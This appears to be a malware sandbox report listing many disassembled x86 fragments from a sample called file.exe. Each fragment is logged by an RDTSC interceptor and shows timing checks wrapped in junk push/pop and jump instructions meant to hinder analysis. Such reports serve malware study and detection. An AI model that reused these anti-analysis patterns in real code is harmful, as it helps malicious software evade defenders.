Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953468 second address: 95346C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95346C second address: 9534CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F988C7CE31Ah 0x0000000c jmp 00007F988C7CE325h 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 jmp 00007F988C7CE31Dh 0x00000019 jmp 00007F988C7CE320h 0x0000001e pop edi 0x0000001f jmp 00007F988C7CE324h 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953B96 second address: 953BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0291h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953E5F second address: 953E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9540FD second address: 95413F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F988D0B0292h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jns 00007F988D0B0286h 0x00000012 jbe 00007F988D0B0286h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jmp 00007F988D0B0296h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95413F second address: 954145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90599A second address: 9059A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9059A0 second address: 9059D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F988C7CE316h 0x0000000a jmp 00007F988C7CE325h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F988C7CE320h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95457A second address: 954580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 952E5A second address: 952E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 952E73 second address: 952E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95FD03 second address: 95FD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95FD07 second address: 95FD0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95FD0B second address: 95FD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95EB5E second address: 95EB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 928EB0 second address: 928EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 928EB7 second address: 928EBC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9291DC second address: 9291E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9291E1 second address: 76EB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a xor dword ptr [ebp+12484F1Dh], esi 0x00000010 push dword ptr [ebp+122D15EDh] 0x00000016 call dword ptr [ebp+122D1E38h] 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D33D9h], eax 0x00000023 xor eax, eax 0x00000025 sub dword ptr [ebp+122D33D9h], edx 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f jne 00007F988D0B028Ch 0x00000035 mov dword ptr [ebp+122D3767h], eax 0x0000003b clc 0x0000003c mov esi, 0000003Ch 0x00000041 mov dword ptr [ebp+122D33D9h], edx 0x00000047 sub dword ptr [ebp+122D33D9h], eax 0x0000004d add esi, dword ptr [esp+24h] 0x00000051 add dword ptr [ebp+122D2B50h], edx 0x00000057 lodsw 0x00000059 sub dword ptr [ebp+122D2B50h], ecx 0x0000005f add eax, dword ptr [esp+24h] 0x00000063 sub dword ptr [ebp+122D2B50h], edi 0x00000069 mov ebx, dword ptr [esp+24h] 0x0000006d stc 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 push esi 0x00000072 jmp 00007F988D0B0296h 0x00000077 pop esi 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929350 second address: 92935D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92935D second address: 929361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9293D7 second address: 9293DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9293DB second address: 9293E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9293E1 second address: 9293F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE324h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929B40 second address: 929B74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007F988D0B028Ah 0x00000010 pop esi 0x00000011 nop 0x00000012 mov ecx, ebx 0x00000014 push 0000001Eh 0x00000016 mov cx, si 0x00000019 nop 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F988D0B028Ch 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929B74 second address: 929B9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F988C7CE316h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F988C7CE322h 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929CD4 second address: 929CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929CD8 second address: 929CDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929CDD second address: 929CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnc 00007F988D0B0286h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929E82 second address: 929E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F988C7CE31Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929E93 second address: 929EA8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jc 00007F988D0B0290h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95EFB4 second address: 95EFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95EFB8 second address: 95EFD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e jmp 00007F988D0B0292h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965013 second address: 96501C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96501C second address: 965020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965020 second address: 965024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965024 second address: 96502A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96502A second address: 965043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F988C7CE316h 0x0000000e jmp 00007F988C7CE31Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9655C3 second address: 9655FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F988D0B0286h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b ja 00007F988D0B0286h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 jbe 00007F988D0B0286h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F988D0B0291h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9655FC second address: 965600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965600 second address: 965635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F988D0B0298h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96598E second address: 965996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965B17 second address: 965B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965CA4 second address: 965CC9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F988C7CE329h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9691FA second address: 9691FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 968F2C second address: 968F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 968F30 second address: 968F36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 968F36 second address: 968F3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B77B second address: 96B781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B336 second address: 96B33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B33E second address: 96B343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B343 second address: 96B36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F988C7CE329h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F988C7CE316h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B4CB second address: 96B4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F988D0B0286h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96CE17 second address: 96CE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 972335 second address: 97233F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F988D0B028Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9724A6 second address: 9724AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9724AB second address: 9724CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0292h 0x00000009 jmp 00007F988D0B028Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9724CF second address: 9724D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9724D3 second address: 9724E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F988D0B0286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F988D0B0292h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9727A1 second address: 9727CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE320h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F988C7CE328h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929904 second address: 9299A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F988D0B0294h 0x00000011 mov ch, al 0x00000013 mov ebx, dword ptr [ebp+1248DA46h] 0x00000019 jl 00007F988D0B0297h 0x0000001f call 00007F988D0B028Ah 0x00000024 jl 00007F988D0B0286h 0x0000002a pop ecx 0x0000002b add eax, ebx 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F988D0B0288h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 sub edx, dword ptr [ebp+122D381Bh] 0x0000004d nop 0x0000004e jmp 00007F988D0B0293h 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jp 00007F988D0B0290h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9299A4 second address: 929A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b js 00007F988C7CE31Ch 0x00000011 je 00007F988C7CE316h 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F988C7CE318h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 call 00007F988C7CE31Bh 0x00000038 sub dword ptr [ebp+12455E52h], edx 0x0000003e pop edi 0x0000003f nop 0x00000040 jc 00007F988C7CE31Eh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push esi 0x0000004a jmp 00007F988C7CE31Dh 0x0000004f pop esi 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929A12 second address: 929A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9736CF second address: 9736FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F988C7CE31Ch 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F988C7CE322h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F988C7CE316h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9760D1 second address: 9760D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9760D5 second address: 9760DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9760DF second address: 9760E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9763E8 second address: 97640D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F988C7CE328h 0x00000008 pop esi 0x00000009 pushad 0x0000000a jnl 00007F988C7CE316h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97AAF4 second address: 97AB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007F988D0B0286h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97AB01 second address: 97AB11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F988C7CE316h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97ADA5 second address: 97ADC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F988D0B0286h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F988D0B0292h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97ADC9 second address: 97ADCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97ADCD second address: 97ADF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jnp 00007F988D0B02A9h 0x0000000d pushad 0x0000000e jmp 00007F988D0B0299h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97AF44 second address: 97AF4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97B098 second address: 97B0A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97B0A2 second address: 97B0A8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97B0A8 second address: 97B0AF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 983B88 second address: 983B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F988C7CE316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 981D8A second address: 981D97 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 981D97 second address: 981D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9820A5 second address: 9820BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F988D0B0292h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9820BC second address: 9820D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F988C7CE323h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9820D8 second address: 9820DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9820DC second address: 9820FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F988C7CE326h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9820FF second address: 982111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988D0B028Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982431 second address: 982435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982435 second address: 98243B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98243B second address: 98244B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jp 00007F988C7CE316h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98244B second address: 98244F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98244F second address: 982481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE31Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F988C7CE31Fh 0x00000013 ja 00007F988C7CE31Ch 0x00000019 jng 00007F988C7CE316h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982481 second address: 982493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B028Eh 0x00000009 rdtsc
